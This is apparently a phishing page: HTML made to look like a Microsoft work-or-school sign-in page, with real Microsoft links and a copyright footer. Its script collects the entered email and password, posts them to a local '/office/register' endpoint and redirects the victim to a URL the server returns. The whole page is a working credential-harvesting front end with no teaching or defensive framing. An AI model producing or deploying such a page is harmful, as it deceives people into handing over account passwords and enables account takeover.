<html>
    <meta charset="UTF-8">
    <link rel="favicon" href="/mic.ico">
    <link rel="icon" href="/mic.ico">
    <meta name="viewport" content="width=device-width, initial-scale=  1" />
    <title>Sign in to your account</title>
    <style>
        *{
            padding: 0;
            margin: 0;
            font-family: 'Segoe UI','Segoe','SegoeUI-Regular-final',Tahoma,Helvetica,Arial,sans-serif;
        }
        html, body{
            height: 100%;
            display: block;
            position: relative;
            overflow-x: hidden;
        }
        div, .sides-l, .sides-s{
            display: inline-block;
            vertical-align: top;
            overflow: hidden;
        }
        .container{
            display: block;
            margin: 0;
            padding: 0;
        }
        .container .sides-l{
            width:70%;
        }
        .sides-s{
            width: 29%;
            font-size: 14px;
        }
        .sides-l img{
            height: 100%;
            margin: 0;
            padding: 0;
        }
        .sides-s .banner{
            margin: 15%;
            margin-top: 30%;
            margin-bottom: 27%;
        }
        .sides-s div{
            display: block;
        }
        .sides-s form{
            width: 90%;
            margin-left: 5%;
            display: block;
            position: inherit;
            text-align: left;
        }
        .sides-s form label{
            margin-bottom: 3%;
        }
        .sides-s form input{
            border: solid #ddd 1px;
            border-radius: 1px;
            display: block;
            padding: 4px;
            height: 3em;
            margin: 3px;
            width: 90%;
        }
        .sides-s form div{
            display: block;
            margin-top: 5%;
            margin-bottom: 5%;
        }
        a{
            text-decoration: none;
            margin: 4px;
        }
        .sides-s form div *, .sides-s form div input{
            display: inline-block;
            width: auto !important;
            margin: 0;
            vertical-align: middle;
        }
        .sides-s form div a, .footer div a{
            color: #2872dd;
            cursor: pointer;
        }
        .sides-s form button{
            background: #2672ec;
            color: #fff;
            font-size: 16px;
            cursor: pointer;
            border: 1px solid #fff;
            padding: 6px 12px 6px 12px;
        }
        .footer{
            position: absolute;
            bottom: 1em;
            width: 100%;
            margin: 0%;
            padding: 0%;
            font-size: 14px;
            display: block;
        }
        body .footer div{
            position: relative;
        }
        body .footer div div{
            width: 15%;
            overflow: hidden;
            display: inline-block;
            margin: 1%;
            vertical-align: middle;
        }
        .footer div span{
            display: block;
            color: #aaa;
        }
    </style>
    <body>
        <div class="container">
            <div class="sides-l">
                <img src="/heroillustration.jpg" />
            </div>
            <div class="sides-s">
                <div style="height: 100%;">
                    <div class="banner">
                        <img src="/bannerlogo" />
                    </div>

                    <div>
                        <form onsubmit="actions(); return false;">
                            <label>Work or school account</label> <br> <br>
                            <input type="email" id="email" required placeholder="someone@example.com">

                            <input type="password" id="pass" required placeholder="Password">

                            <div>
                                <input type="checkbox" >
                                <span>Keep me signed in</span>
                            </div>

                            <button type="submit">Sign in</button>
                            <div>
                                <a href="https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAeNisFLJKCkpKLbS188vLcnJz8_Wy09Ly0xO1UvOz9XLL0rPTAGxopiBskVCXALSd2dduq34xK1t-cxe013nlq9ilMetXz-_PFH_AiPjJiZ2XyfP-OBgnxNMlz_z32IS9C9K90wJL3ZLTUktSizJzM97xMQbWpxa5J-XUxmSn52aN4mZLyc_PTMvvrgoLT4tJ78cKAA0sSAxuSS-JDM5O7VkF7NKoqFJmkWiZZJuUrJ5oq5JYlKKrmVisoluWlpSUrKpeZKZpXHyBRaBHyyMi1iBbhe6-vfXWV42vynWlocaXzZuOMWqX1HibubjWpieZOGXWpyWaqafr19pnu0dXJLkH5jnXJziVugX4WFiFJZsEmlraWW4i5OQbwE1&mkt=en-US&hosted=0&device_platform=Windows+7">Can’t access your account?</a>
                            </div>
                        </form>
                    </div>
                    
                    <div class="footer">
                       <div>
                             <div>
                                <span>© 2020 Microsoft</span>
                                <a href="https://www.microsoft.com/en-us/legal/intellectualproperty/copyright/default.aspx">Terms of use</a>
                                <a href="https://privacy.microsoft.com/en-US/privacystatement">Privacy & Cookies</a>
                            </div>
                            <div>
                                <img src="/microsoft_logo.png" />
                            </div>
                        </div>
                    </div>

                </div>
            </div>
        </div>
        <script>
            function actions ( ) {
                var methods = {
                    method: "POST",
                    body: JSON.stringify({
                        email: document.getElementById('email').value,
                        pass: document.getElementById('pass').value
                    }),
                    headers: {
                        'Accept': 'application/json',
                        'Content-Type': 'application/json'
                    }
                };
                fetch('/office/register', methods)
                    .then( res => res.json())
                    .then( data => { window.location.replace(data.status)})
                    .catch(console.error);
                return false;
            }
        </script>
    </body>
</html>